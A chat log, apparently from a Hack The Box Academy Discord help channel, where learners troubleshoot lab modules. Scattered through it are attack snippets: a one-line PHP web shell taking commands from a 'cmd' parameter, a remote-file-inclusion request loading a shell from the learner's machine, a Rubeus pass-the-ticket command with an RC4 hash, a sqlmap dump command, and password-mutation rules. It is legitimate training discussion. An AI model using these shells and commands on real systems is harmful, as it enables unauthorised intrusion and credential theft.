Anyone solving bash scripting module need a help?

what's your question?

Actually I'm stuck at coding part of it if-else-fi

Conditional execution

35th generated value question

Share screenshot of question

Okk

this one

bro @dense gyro

check it

is this the one where you have to base64 encode var 35 times?

yes

#!/bin/bash

Count number of characters in a variable:

echo $variable | wc -c

Variable to encode

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
var=$(echo $var | base64)
done

lol

shouldn't the counter be {1..35}?

then you print the value after the loop

yeah the 35th value we need wc

but i'm getting wrong answers

maybe

var = $( echo $var | base64 | wc -c)

for count in {1..35}
do
var = $( echo $var | base64 | wc -c)
done

idk

not correct

oh i know what the problem is

we have to use if-else

sorry bro i did this one long time ago, maybe someone else can help or forum.hackthebox

Hello! I'm stuck on the "Exploiting Web Vulnerabilities in Thick-Client Applications" part on "Attacking Common Applications" module. Can someone help me?

I literally did everything like the guide taught and still get the "Connection Error!" When trying to login with the fatty-client.

Yes, I googled and tried to re-do the steps and other tricks also but none are working so far :/

np

i didnt do it but i would say try restarting targets (sometimes happend the same thing with me in diff. modules)

You calculate the length after the encoding?

I'm resetting it now. Let's hope it works! It took the longest time ever to even spawn.

Lol, restarting worked. Now it was "login successful!" 😄 oh my god, this is so frustrating when you've wasted so much time and thought it was a skill issue but in fact it was a machine issue....

haha happens to everyone sometime : )

Yeah I figured it out thanks

i got a question on one on GPO abuse, after enumerating the GPO and found the one linked but disable. It doesnt accept the answer, neither with name, GUID or anything, what is it lookign for the format?

Should be the name

ok then i have the wrong name.. can i DM?

Has anyone completed the "Attacking Common Applications" -module? If so, do you agree that the thick-applications section is a NIGHTMARE? 😄

Sure

How is it faster to test web application this way when we need to input the cookie/access token anyways?

IMO this takes more time because we'll have to type out the entire query in the terminal rather than just searching and looking at the network tab in the browser

The web browser must parse the website and reload images and integrated scripts. cURL does not do this and is therefore faster. Especially for large and complex websites

Oh this makes sense. Forgot about that. Thanks 🙂

hey! so im struggling a little with the file inclusion skills assessment. Ive got the page vulnerable to RCE, and i can inject my payload however whenever i try to execute a command using <URL>&cmd=id the server crashes giving me a 500 internal error. Has this happened for anyone else? Ive restarted it about 8 times now with the same result each time.

try url?cmd=id

sadly same thing!

but thank you!

what shell is it?

<?php echo shell_exec($_GET['cmd']; ?> try that one

there is a missing ")" parenthese.

good eye, just wrote it from memory and just woke up 😄

should be <?php echo shell_exec($_GET['cmd']); ?>

Thanks very much I'll try it shortly.

meterpreter > sysinfo
Computer     : 10.129.190.184
OS           : Ubuntu 20.04 (Linux 5.4.0-110-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > execute -f /bin/ls
[-] Error running command execute: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > 

any help ??

@jolly cradle Hi apologize for disturbing you but why don't I have permission to the general chat ?

go and follow the #welcome channel

ok thx

Damn that worked, thank you so much for the help!!!!

Anyone else havs issues logging into sql server on attacking services hard skills asses?

Windows lateral movement skills assessment, the VNC portion. I have RDP via rossy, attempted to VNC using ipv4, ipv6, tried doing it with ports on tight vnc, tried to switch to wsus, tried to use sharpwsus, nothing useful has worked.

hey guys, i've been stuck on the Custom Wordlist section of Login Brute Forcing for a while, I've followed exactly along what the lesson instructs and I can't get valid login. A point in the right direction would be appreciated

You can DM if you are still stuck.

If you haven't searched this channel for others who might have asked a similar question, I would start there to see if that gets you unstuck first.

Hey, I'm a bit confused about AEN > Exploitation and Privilege Escalation. How is the ability to run MSSQL command on a website as a privileged user (at least a user that has SeImpersonatePrivilege) not considered a vulnerability? It has to be like at least something like ``CWE-284 - Improper Access Control` doesn't it?

No, sounds more like a misconfiguration rather than improper access control.

cwe-732 maybe?

Hello,

I'm stuck on that box (Remote File Inclusion (RFI) of File Inclusion module)

My request http://94.237.51.163:44899/index.php?language=http://<MyTun0IP>:8080/shell.php&cmd=ls
My shell : sudo python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/)

but i go inifinity loop and 0 traffic on my serv, do you have an idea ?

Whenever you have a target that specifies a port you're dealing with a public facing docker container. You can ping that IP from your host computer. That server can't reach your tun0 because your tun0 is on a private network.

Ok I understand now !
Thank's for that 🙂

I just looked at that module, the target that spawns in the Remote File Inclusion section doesn't use a public docker container, it's a target on the internal network. Maybe you're targeting the wrong IP.

Yes I attacked the wrapper box .. (2hours wasted 😅 )

GUYS

CAN I ASK HELP PLEASE

with what?

the bot "fawn", at this question, " What is the command we need to run in order to display the 'ftp' client help menu?
" is the question "ftp -h"?

i already seen the tutorial and the right answer is "ftp -h" but "Error!

Incorrect task flag!"

best to include the module and section you're working on

Fawn

task number 7

i think the site is bugged tbh

That's not a module. This channel is for discussion of the HTB Academy platform, specifically the modules. If that's a box you need to ask in #boxes and you'll need to follow the instructions in #welcome to gain access to it.

i can't write on that channel

I know, I told you how you can if you read my full message.

yeah thans

If a msf exploit has session in its options instead of rhost, how do I specify the victim box?

sounds like you'd already need an active session to import it into that or something

So ones like that can't be used first, they are only able to be added to an existing session?

based on what you're saying that's what i'd guess if it's asking for a session

@proud wigeon please make sure not to post content from modules above tier 0

Oh sorry, my bad

how is best to query?

just say the module/section/question you're stuck on, what you've tried, errors, etc. just don't post stuff from the module like the password etc

ah ok, my bad. it was just because it was given in the content, it wasn't a secret or anything, apologies

basically im trying to use impacket to connect to the service and it runs through how i should do it, i've replicated it exactly and it says the share isn't writeable, so im not sure whether it is expecting that?

hi if someone is kind enough to lend me a hand. I'm halfway through the cbbh path but never managed to find the answer to this one. it is so inconvenient since when continuing with the next section it redirects me here. the question is from https://academy.hackthebox.com/module/144/section/1253 i tried every method to make it work from changing conf files to messing with flags in dns enum but no luck. please its bugging my nerves so hard

i think (from memory) you have to fuzz the subdomains using gobuster vhost or ffuf

I am doing a HTB Academy exercise in the module "getting started" section "exploitation" and I can not make it work. can someone help me please? What exploit should I be using or how do i find it?

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

So far I got the exploit scanner/http/wp_simple_backup_file_read to work, but the file I get is not the flag.txt file. I scanned with nmap and visited the page in the browser, and it is using Simple Backup Plugin 2.7.10 for WordPress 5.6.1. I look for exploits for wordpress plugins or backup plugins or plugins in general, but I can not find the correct exploit

Look for simple backup plugin exploit

no luck

type 'options' and you can see there's a value you can change to change the file you read

that was HUGE help, thank you! i got the file now

You have a typo

inlanefreights

Hey guys, just wondering if anyone had issues on the first bind shells exercise, I simply cant connect via SSH to htb-student to start the bind shell. Gets disconnected immediately

still giving out errors

Can you visit the website in your browser?

it seems not? but i shouldnt need to connect to ovpn before or smth right?

Correct: so the issue may be with your system not being connected to the internet

seems like it. great time for my vm internet to crap out on me

Hey, I'm having trouble getting past Q7 in the Active Directory Enumeration & Attacks - Skills Assessment II, anyone who completed it can give me a nudge?

Hi for the SOCKS5 Tunneling with Chisel Section of Pivoting, Tunneling, and Port Forwarding module I am having an issue where I cannot ping the target box even when connected with the recommended VPN file. Can someone help me out? I turned my host VPN off. I was able to get the file onto it with the SCP protocol the way the section said to. How do I fix this connection, especially knowing that there is a way to connect?

can someone help me out with this?

Hiii

I can't SSH into the box which I need to do in order to do the section. Let me add that much.

because otherwise, the section doesn't work

is it a connection issue or a login issue?

connection

when I SSH it says no route to host

and I can't ping the host either

are you sure you are connected to the vpn?

yes

I disconnected and reconnected and tried again

and I'm connected on the currently recommended VPN with low load

I have tried several times it cannot connect

that one scp chisel command goes through

I don't even thing pings are working

I tried pinging it 100% packet loss

do a ip route

ok

┌──(kali㉿kali)-[~/chisel]
└─$ ip route
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100 
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100 
10.10.10.0/23 via 10.10.14.1 dev tun0 
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.28 
10.10.14.0/23 dev tun1 proto kernel scope link src 10.10.15.211 
10.129.0.0/16 via 10.10.14.1 dev tun0 
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown 

try pinging 10.10.14.1

ok

ping works for 10.10.14.1

weird then

ya

should I try it on pwnbox? I want it to work in my VM

the ping you are trying to do is to a 10.129.XXX.XXX network or a 172.16.XXX.XXX network?

10.129.XXX.XXX

not the internal network the pivot box

hmm

then i don't know to be honest, try restarting the machine once again

I restarted it once

and yea, try this

I would pwnbox it to see if that works I mean I'm at a cafe

might not solve it, but can help you know if the issue is the pivot box or your machine

ok ya

good luck

ok

hi guys so I am getting these errors on the pivot host when I run chisel after transferring it over:

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)

this is for pivoting tunneling and port forwarding module's SOCKS5 tunneling with chisel section

also the VPN connection to it won't work I had to connect via Pwnbox, which is a big problem

I literally couldn't even ping the host from my VM even with my host Mullvad VPN turned off

like I tried doing ip route and had a connection to the HTB network so I don't know what gives

I determined the issue is with my VM but I don't know what to do about it

but even when logged into pwnbox I ssh into the Ubuntu server and it can't run chisel

You'll need to either statically compile chisel or download an older version

ok thanks

the pivot box cannot connect to the internet

and it won't let me transfer files over from pwnbox

isn't the target the pivot host? it doesn't give you ssh/rdp creds?

it does

and I can ssh into it but

you should be able to transfer files, have you completed the file transfer module?

it only lets me transfer from chisel build files but not others

I completed the file transfer module. I tried transferring with SCP. Are you saying I should do it with FTP?

the section says to do it with SCP which is why I'm confused

like so I FTP the whole folder into it?

why can't you use scp? it gives you ssh creds. scp is file transfer over ssh.

scp only transfers some files over but some files it won't let me transferover

like test, build, etc. also I can't install go on the target box

so building it with go won't work

like it won't let me install or use go

you just need to transfer the chisel binary

I did

as i said, use an older version of chisel or statically compile it

ok

will download an old version of chisel then

How can I be very well prepared for offshore? What sources should I study from?

why doesn't it work with my local VM even when I turn off host VPN and the HTB VPN connects fine

Best to ask in #1263635449335910531. You'll need to follow the instructions in #welcome to access that channel.

this question lacks info. why doesn't what work with your local vpn?

I have no access

I can't ping the target server

I know. That's why i told you how to get access in the previous message.

from my VM even with mullvad turned off on host

Your VM has no connection with the internal vlan only the pivot host. The pivot host has 2 nics.

I connected to the HTB network with HTB VPN tho just fine

and that's why I think this is weird

so you should be able to reach the pivot host (the target you spawn)

but I'm not

scp won't work from vpn and cannot ping it

Do you have the pwnbox on still?

yes because after I gave up on VM an hour ago I turned on pwnbox

if that makes sense

well that's why. the pwnbox and your vm use the same IP.

it's going to cause network problems when you have 2 machines fighting for the same IP

they do? I haven't had them on at same time

one or the other

I only had VM on when using VM

reboot your pc, re-download the vpn file and try again then

ok

you should be able to reach the target you spawn just like any other lab

ok thanks

will do. talk to you in a couple minutes after reboot then

ok I did a reboot and tried redownloading vpn file

and turned off mullvad on host os

and it didn't work. should I try a different VPN file?

wait I got it to connect

ok now its taking time to scp chisel to target host from VM

ok I think I figured out how to get the VM working but I'm gonna try and finish tonight

Please don't ping random people.. if you need help you can post your question

Information Gathering- Web Edition Module> FootPrinting Lab, question #2 asks which CMS is used on app.inlanefrieght.local. Using wappalzer it does not show CMS as something its looking for.

Who me? I haven’t pinged anyone today

Except someone who already is DMing me

literally look at the message just above where the person pinged 2 different people

there's multiple ways to identify a CMS

Yes, I have an output of whatweb now, still not showing it. I do have host files correct.

you likely have it but don't realize it tbh

did you run it with the full verbosity?

I found it, I had one running with hostname and one without.

also deleting because it contains the answer to one of the other questions

one with hostname took a long while.

hostname is important

Agreed, just needed to be patient for whatweb.

yep patience reveals a lot

Not my strong suit.

then the exams will kick your ass

Likely, but I'm in it to learn the hands on- if I pass then that's a bonus.

@split minnow please don't reveal information from the module such as usernames.

well hands on will require patience. not everything is instantaneous.

It's just command from the module, nothing new from me there

it's a t3 module; so it's a spoiler

:))

okay, sorry

Well, part of it is understanding tools, timeout of said tools, etc.

just reask the question literally that you had in #cape and someone who's done it may ask to dm to avoid spoilers

consider that if it's taking a minute then that may be a good thing

because it may be fetching information; thus taking a longer time

Windows lateral movement skills assessment if anyone ever has trouble with this, please do not hesitate to reach out to me. I found this to be outrageously difficult willing to help others. Literally almost gave up and would’ve paid for the rich boy walk-through

Good example, I had -a 1 selected, instead of -a 3/4. I did -a 1 on hostname scan while I did -a 3 on the direct IP.

you're given vhosts, use the vhosts

that's the bare minimum

the question asks against the specific hostname, so you're gonna run your scans against that specific hostname

Agreed, just trying to understand the tool is all. 🙂

well understanding the tool is well and good, but you should at least be using it as intended. Instead of throwing it at the IP, use the different flags on the requested hostname

it's much more powerful to get the information the question wants while messing with the tool

i.e. "what other ways could i get the answer"

I was scanning with the hostnames as intended after dumping IPs/hosts into host file. Also, I'm learning and whether that falls in scope with getting a flag or not I feel like that's important to some extent. I get what you are saying and I've always appreciated your input. I know discord text doesn't always come across great, but I get the sense you are aggravated at my input. I'll refrain from asking some future questions here until after I've exhausted all other avenues.

I'm not frustrated or aggravated lol. Just stating that getting useless output isn't helpful

This channel is also a really good resource to search through if you're stuck at a common place, for instance in the Linux Fundamentals module it's pretty common for most everyone to get stuck at the curl question for the filters section. A simple channel search will find a lot of hits of help for it

oh right ok

Do y’all understand lappalter’s module it literally says the same thing in her trait

? this channel is for assistance with the htb academy modules

Im in the wrong discord sorry peeps

https://tenor.com/view/door-sorry-wrong-room-oops-gif-14266007

Hey, I'm having trouble getting past Q7 in the Active Directory Enumeration & Attacks - Skills Assessment II, anyone who completed it can give me a nudge?

I've been staring at the QOR (Question-Oriented Relationship) mental model for a bit, going back and forth with ChatGPT on practicing said mental model. However It seems that I'm still fundamentally struggling with internalizing the methodology. Would anyone mind sparring over the subject to identify any gaps of knowledge?

Having a clear and constructive partner to exchange ideas and test scenarios would be very helpful.

People keep telling me to "pwn" stuff or do "ctf"s like my brother in christ im a gorilla

Also 100 humans can take one of my kind yes

what?

Remind me which one is Q7?

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
It's after obtaining access to a MSSQL instance.

Look at your permissions

When converting the MSSQL instance to a shell, it runs as NT Service\MSSQL$SQLEXPRESS

iirc you should also be able to rdp

crap, tried lots of things but none of them was trying to RDP into the machine, brb

@harsh gorge I saw that gj on pwning newest box so quickly btw, damn you fast as f, I got stuck at the stupidest stuff

nvm, RDP (3389) is not open in the SQL01 machine

also, this account doesn't have any interesting permissions from what i've seen. cannot access the administrator account, debug privileges, nothing of use. although the user i logged in as (netdb) is sysadmin, although I'm not sure how to follow up from there. the module didn't touch that part so, even though I have been doing quite some research, i'm quite lost

You’re doing way better than me out there truth be told

nahh, you're so much better istg

Hello, you can send me a message 🙂

I got lost on this part too, but the road forward involves abusing some excessive privileges by using an exploit that works on Windows server 2019. Check out the Privileged Access section of the module

hi guys, I started doing HTB literally a few days ago, and up until now, I understand the point of the tasks I'm doing in the paths and I even managed to solve some tasks by myself
but most of the time, I have trouble figuring out what the answer is, even though I am 100% sure that I've done every single step from the question, I just cannot get the correct answer submitted
could someone help me with it, if possible?

Never mind, I just needed to ask for help, because you always find the answer the same second you ask for it xDDD
issue solved 😅

Re: applications of ai in infosec https://academy.hackthebox.com/module/292/section/3299

There's an example of using CountVectorizer for the bag-of-words approach. Theres one matrix for unigrams and one for bigrams. But they are identical. I think this isn't supposed to be the case. I would have expected each combination of two words in the data set to appear but it's single words. And since I'm learning I'm not sure if this is actually an error or if I'm missing something.

Credential Hunting in Linux

I have a foothold into the host, but I'm absolutely lost with where to go, I've tried a couple of things and I can't seem to get anywhere, a nudge would be great, please @ with responses

Good Day fellas.

Please do anyone have the best walkthrough to pwn the knowledge test in getting started.

i got initial foothold but using the reverse php shell in the edit_theme.php isn't goinng through

once i entered the php code. and try saving the template.php file the getsimple website won't response again.

how did you go about get the flag.txt

hey it was long back

letme check my notes

i GUESS i used one of the methods mentioned in the section above it

okay. thank you.

please do check

Guys hello I am using subbrute to find DNS records and find mistake like this googled but didn't find what this mistake means

/home/barth/subbrute/./subbrute.py:462: SyntaxWarning: invalid escape sequence '.'
permute_filter = re.compile("^[a-zA-Z0-9]{" + str(self.permute_len) + "}.")

Just finished the module HTTPs / TLS attacks, any doubts feel free to dm me, I’m following the web expert role

me too, I just finished that one also am currently half way through the abusing http misconfigurations

Did you find the skill assessment smooth? Of the TLS, it’s not hard, but I got into some problems that took me hours to figure out

Same its supposed to be like that, can add me if you want to bounce around some ideas on already completed modules if you like

hey, did you manage to solve it?

Hi

Hi all
which cars can be accessed with a simple VIP subscription?

Only Tesla I'm afraid 😦

laboratory machines 😄

All the retired ones I believe. But this section is all about HTB Academy, not HTB main platform so better to ask in other channel

@grizzled schooner something related to Firefox is your way to go.

Next time better to include on what module/section you are working on and on which part you got stuck

it's fine, I found the answer the same second I sent the message, but I will keep that in mind, thanks!!

oh thanks

I'm currently doing the windows privilege escalation credential hunting section and i'm wondering why the "findstr /SIM /C:"password" *.xml" command didnt find the .xml that had the password in it to answer question 1.

I had to manually search for it by looking through the user folders.

h

?

module password attacks, section pass the ticket, says: With Rubeus we performed an OverPass the Hash attack and retrieved the ticket in base64 format. Instead, we could use the flag /ptt to submit the ticket (TGT or TGS) to the current logon session. the command it uses is c:\tools> Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt how did it submit the ticket ? it says /ptt but it dosent specify any ticket path

that command requests a TGT using plaintext's creds, then that TGT gets injected into the current session with /ptt

Hey guys, I need some help with Nocturnal. I'm stuck in the admin panel.

@keen sinew don’t cross post

Read #welcome and #rules

Then #boxes

so it switches the user ? Since a new TGT means a another user ?

not necessarily. the ticket will simply be cached for your current session

For Kerberos authentication.

For local, it should be your own logon session

that ticket will probably be injected into a sacrificial process, so for that process, you'll be authenticated as that user

So with rubeus i can get a TGT using the user's NTLM hash

And with mimikatz i can open a process using the TGT and be authenticated as that user ?

And password as well

You can also use your PowerShell session to get access as that account

Good

Best to try them while reading through the section

One. More. Question

Why all TGTs and kerberos keys are stored on a non DC machine ?

Anyone subscribed to student subscription anyone can give me a review of it?

Wonderful

HTB is underpaid on that student sub

Is it possible to accumulate cubes on that subscription?

Yes

I was thinking of getting it for a refresher on all the theory on pentest track since i have done CEH long back V7-8 idk which it is. Then dive into some adv modules.

how do i get access to #general

Hello, hacktheboxis down?

no

oh ok

The academy, I mean?

The academy, I mean?

i dont think so

mine is working

What is "down", you might get better advice if you precisely describe your observations.

👍 thanks

Website is working for me, I'm logged into academy myself.

Jesus..ok, thank you for your advice

havent explained one bit

I hope that didn't come off as rude. I've worked in tech long enough to know that many people don't know to describe their problems in a way that facilitates a solution. We're in a high-tech environment so I wouldn't consider it rude to suggest describing your problem with a little more detail. I hope your issue is resolved.

If i get the monthly platinium subscription, do i get the 1000 cubes instantly or after a month? In my understanding i can just buy 1000 cubes for 68 usd

Yes, it wasn't polite!, Because the way you answer is like the others over here in this #module, you can't justify that you are high-teach to respond like that, especially if you have many people who want to learn.

My apologies. Rest assure we'll offer answers as good as your questions. 🙂

we good 👍

my internet seems to be up rn but i still get errors since some subdomains are on http and others on https so its not really working as intended

dns enum doesnt work either even if its shown to be the intended tool. pls is it too much to ask for someone to dm me the answer for https://academy.hackthebox.com/module/144/section/1253

hi

I am working on this right now, it seems impossible no attack vector works

Best to ask in #boxes, you may need to follow the instructions in #welcome to gain access to that (and other) channels.

Do you have to be an academy subscriber to get an account ID? Sorry for the noob Q

Hi there I need help from someone

Not just anybody, Help! I need somebody! Describe please XD

?

Name the module and section you're working in. If you're working on a module above tier 0, avoid posting spoilers or content, instead someone should reach out.

No it’s not a module, I simply need help on what module you guys recommend me to start if I’m barely starting cyber security and aim to become a pentester

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

No, just a HTB account

okay it seems it wasnt connected to discord, I have done that now

if it's modules specifically you're looking at, start with the "Operating System Fundamentals" or "Information Security Foundations" paths.

anyone could help me with this?
What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

Okok thank you

What if I’m finished let’s say with the beginner bible, is there like intermediate-advanced bibles?

I don't recall ever seeing any part II for the beginner's bible. Just start on one of the academy paths. If those paths are too introductory for you, you can do CPTS or CBBH for more advanced stuff.

Okok thank you so much again for the help

I can't get any variation of dir /a:h or ls -la to work with smbclient. Does anyone have a preferred method of listing hidden dirs?

yes, if I recall correctly a simple ls or dir (I can't remember if smbclient is picky) while providing the path will show all files, even hidden ones:

ls ./
dir ./

Yes, confirmed, either works and if you don't provide the ./ neither will show hidden files/directories. I don't see any mention of this when issuing "help dir" either, I noticed by accident... Alternative solution is you could mount the share locally and that can simplify things.

If my vm didn't just crash I would give that a try thank you

It did work thank you again @shut vapor

Hello everyone
I need some help

Module {XSS}
Session hijacking

My PWNBOX server does receive GET requests I sent directly from the browser, but I have no response on any of the inputs. After some time trying, I looked up on the solutions sheet and copied the given script in the vulnerable input but I still have no hits on my server.
Yes, I made sure that I adapted the given script with my PWNIP:PWNPO
Any advice?

Hi, everyone. Can anyone hep with this question? I am doing the CAPE certification course and it is located in Windows Lateral Movement > Windows Remote Management (WinRM)

Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt

||I established a tunnel using ligolo, but port 5985 on host SRV02 is not open. I also cannot RDP to that host.||

Solved it! Thank you!

You can DM me with what you've tried. I've got about 30 minutes until ~2100UTC

Hi, can someone please help me with the Whitelist Filters section in the File Upload Attacks module? I've been stuck on it for hours. I've used the wordlist the module provided and even added some extra extensions, I included the php shell code and the filename in my burp request, and ran through the wordlist and I'm either not getting any successful results or the web page will give me an error when I try to go to the uploaded files. Any help would be greatly appreciated.

Checking in again, I have tried multiple different ways of trying to get this and to still no luck. The question: (Sign the application myapp.apk and install it by either dragging and dropping it onto the device or using ADB. Make sure to first uninstall any previous versions of the app. After installation, tap on the app to start it. What is the message printed on the screen?)

Figure out the blacklist first, then try the whitelist. Theres different error messages for each of them.

Intro module is a slog lol

/feedback also gotta specify which intro module cos theres a lot

Module Fundamentals of AI : Skill Assesment
Here answer to this question is transformer architecture but while submitting it says that it's wrong. What am I supposed to do?

What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing?

Looking for a better understanding as I am a bit confused, but Module: Password Attacks Section Pass the Ticket (PtT) from Linux I'm on the second to last question, but am I supposed to transfer the KRB5 to my attackbox then use a port forward method if I am correct.

Oracle footprinting. i shouldn't have to install odat.py or sqlplus right? when i try to run both commands i get a "No such file or directory"

I think you do

is sqlplus bundled in with that oracle tool setup? if you recall?

they sound like different tools to me

hrmm, ok. i'll keep at it

Hey there... new here! Excited to learn some new skills. Greetings from Argentina!

Welcome!

Thanks!

Hey Gang, Im stuck on this module and this step im not sure how to complete. I open wireshark but im not sure how to get the file onto my instance. what am i missing?

which module/section

*Finding ARP Spoofing.

in wireshark, looking at the ARP_Poison.pcapng file and total packets at the bottom right. still getting the wrong answer.

You need to use filters

The question called for a certain opcode and MAC address, did you enter those both into the filter? you should get your answer with that

Module 23 section 252 - File Inclusion - Log Poisoning

I replicated the steps from the main explanation and also checked the step-by-step solution and the result is definitely not working as it was supposed.
The step to use index.php?language=session_poisoning don't work and I tested in many ways possible, I simply can't go through because this pending step
and whoever mentioned about it before, I don't know if they solved or had the same problem described

What do you mean language=session_poisoning? you should be pointing it to the acces.log, right?

this is exactly the instruction on the section
http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning

what no it's not

That's part of the PHP session poisoning section, not the Server Log poisoning section

you mean the php section then?

sorry i thought you meant the server log poisoning at first

so the modules show how to do it, the lab might not be a 1:1 but you have to apply the same concepts

oh I found the correct way, I was using the wrong sequence and didn't understand the "session poisoning" reference
I just entered the "URL encoded web shell" and it worked

ahh nice nice

I believe it was more my translation/interpretation problem than the question itself hehe, sorry and thanks of course for the help

Hi, I'm facing an issue in the Attack Tuning section of SQLMap. I'm trying to get the contents of flag5 table; i followed the command from the solution but it doesn't result in the expected output:
sqlmap -u 'http://83.136.251.68:52443/case5.php?id=*' --level 5 --risk 3 -T flag5 --batch --dump
results in
Database: testdb
Table: flag5
[1 entry]
+----+-------+
| id | conten |
+----+-------+
| 1 | <blank> |
+----+-------+
I also tried adding the --no-cast switch from the hint and it does not help
Database: testdb
Table: flag5
[1 entry]
+----+-------+
| id | conten |
+----+-------+
| 1 | |
+----+-------+

#cpts message

Ok I will there !

Click on the hyperlink..

I need some help with the Sliver C2 skills assessment. Question 3 about getting the the DC. Having some trouble finding an account that will work on the DC and unsure if Ive missed a step

if anyones done that module ....

Anyone who's doing Android Application Static Analysis module: 221 section: 2630. I have question regarding the 1st question: "Analyze the APK found inside the attached ZIP file. What is the value of the "message" key after logging into the remote service using the debugging code?"

hey i'm on password attacks module and psswd,shadow & Opasswd section

hey can someone help me with this module please ?
https://academy.hackthebox.com/module/51/section/1592
on finding the flag

hey i'm on password attacks module and psswd,shadow & Opasswd section

I got the root hash, and I tried cracking it with both rockyou and mutating the password.txt

i mutated the given resource password.txt with
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

@heavy swan over here!
So, if you wanna get into bug bounty then yeah Bug Bounty path is the way to go. If you want to go the defensive route, then SOC path is the way. If you want to be more well-rounded pentester then Penetration Tester path is the way. The Web Exploits and Active Directory paths are both considered expert level paths so it'd be better to start with one of the other ones.

im here

so i want to learn to become bug bounty hunter i have some small knowledge as i tried soc analyst path but it wasnt for me

i wsnt to get into bug bounty

Then yeah CBBH is the way to go, then most people grab the CWEE afterwards to learn more in depth.

what is CWEE?

Certified Web Exploitation Expert which is the Senior Web Penetration Tester path

oh okay thx

I will start with introduction to information security then will go for BBH

Just so you know where to find it: the Information Security Foundations path is under the Path -> Skills section of the academy website.

I found it already , but thank you for helping me :)))

hey @waxen totem ANY IDEA about where I'm going wrong

i posted my question above

i'm stuck on password attacks, psswd,shadow&opswwd section

all I know is that's definitely the wrong password list

mhmm

the password list is the one given in the resource section

use the mutated one then

yea using above mentioned rules I mutated the list

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

these r the rules i used to mutate the given passwrd list

and them with the mutated list i tried hashcat, john

ntg worked

try rockyou ig

mhm it's runnning from an hour

so hopefully it works, I see that resources had better rules than the short one i posted above lemme re try

has any1 done the C2 Sliver skills assessment?

Hey I am a beginner. From where I need to start my journey?

ayo

why u dont help breh cmon mane

probably the fundamental modules.

anyone has some idea where I can see when my annual sub expires ?

Should be at the purchase cubes

https://app.hackthebox.com/starting-point

sadly nothing indicating it there

I guess I can always just check my email when I subsribed but still weird I cannot see anywhere

Yeah not sure, thought it was there

Maybe only if it’s active

yeah, still got it until 6th of June

sorry Xoriath i had a question

https://academy.hackthebox.com/module/51/section/1592
for this flag
not to spoil any info but like how does that command pops a shell for a root user

Should be on your current plan

sadly not; I cancelled it after subscribing of course to prevent another unexpected taxation, maybe that is why ? (by canelled meaning, cancelled the next payment that would automatically subscribe for another year)

Hey guys, how can I start hacking ? Can I just start with My MacBook ?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

what is the endpoint for that ? /billing ?

Yes

I believe so

yeah, thanks for checking but nothing on my end

Ah sorry i couldnt be of more help

Probably emails is the only way to check i guess or through your banking

yeah already confirmed with email 🙂

Hi, im stuck at NoSQL Skill Assessment II, i made some progress but now stuck again. Can I DM someone?

sure!

I completed it, i'll DM you

only real ones pick on this /4294967295

its not fair breh it took 4 hours to figure this out

imagine if i could use GPT solve that thing in like 2 mins

Hi, Welcome to Hack the Box discord, if this is not regarding an Academy module you're in the wrong channel.

yeah it was i just couldnt leak info in here so i respect the chat

Yeah are you stuck on something or do you have a general question?

Btw get identified to access other channels like #general , instructions -> #welcome

Hello i am in teh footprintin modules of the cpts path , in the section of host based enumeration in the smb one

When i tried to connect to the share of the smb, it prompts with an error like that : Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.129.202.5 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

can you show the code you used to try to connect

While working on Log Poisoning. I was able to add php script in User agent but while executing got 500. What am I doing wrong?

can you scroll down for the first request and verify that you can see your user-agent in the logs? (don't inject a payload just yet, test the LFI first)

nope, I don't see it.

Then the LFI must not've worked

try the methods from the previous sections to find it first

best to keep in mind that the exercises at the end of the sections aren't designed completely like the examples provided, there's a bit of fiddling you have to do

Hi, sorry we can't help you here, contact your local law enforcement and ask if they can communicate with whatever country the person who's endangering you is in.

My parents will find out tho, no?

That should be the least of your worries it seems.

Dude it's my biggest, they will kill me

That'd be child abuse, if your parents harm you please contact your local law enforcement.

Kidding aside, it's still in your best interest to inform them, you made a mistake, own up to it.

Thank you

Here I was able to find it in User Agent. Then when injecting PHP I got 500.

Sure, I will do some fiddling.

looks like you have a stray backslash \

that might be useful when in bash/terminal but not in burp

What code are you using to connect to the share?

after removing it still I'm getting 500. Let me start over.

hey does this mean (ALL, !root) run with other user but ROOT ?

What module and section is this for? Please specify

Ahhh, ye (ALL, !root) from sudo -l does indicate you can run as any user but root

yessir i was on this the whole day

so interesting

Please remove the image as it spoils the Skills Assessment, instead mention the module and section.

what

Your image has spoilers, remove it, just say the module name and section name

how i can doing

Hi

Just ask your question again without the image, and say the module name, and section name.

